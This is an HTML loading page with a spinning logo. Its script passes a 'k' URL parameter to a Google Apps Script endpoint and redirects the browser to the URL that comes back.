<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title></title>
   <style>
    body {
      background-color: rgb(255, 255, 255);
      text-align: center;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
    }

    .spinner {
      width: 150px;
      height: 150px;
      background-image: url('https://i.postimg.cc/7Ys3BkhM/AQRT-removebg-preview.png'); /* Ruta de tu imagen */
      background-size: contain;
      background-repeat: no-repeat;
      animation: spin-scale 3s linear infinite;
    }

    @keyframes spin-scale {
      0% {
        transform: rotate(0deg) scale(1);
      }
      50% {
        transform: rotate(180deg) scale(0.8);
      }
      100% {
        transform: rotate(360deg) scale(3);
      }
       50% {
        transform: rotate(360deg) scale(0.8);
      }
    }

    
    
  </style>
</head>
<body>
  <script>
    const AS_URL_BASE = "https://script.google.com/macros/s/AKfycbyX7hjaLf9bnOKS8Mfg3EUgPzbm6uhwn9wTF-RC5rD6GX57MqwrLKh1tgqu0rg7IBR_/exec";
    
    var url = document.location.href;
    var k = url.substr(url.lastIndexOf("k=")+2);
    
    if(k){
      fetch(AS_URL_BASE+'?k='+k)
      .then(r => r.text())
      .then((r) => {
        console.log(r);
        //document.write(r);
        if(r){
          document.location.replace(r);
        }
      })
      .catch(err => console.log(err))
    }

  </script>
  
<div class="spinner"></div>
  
  
</body>
</html>
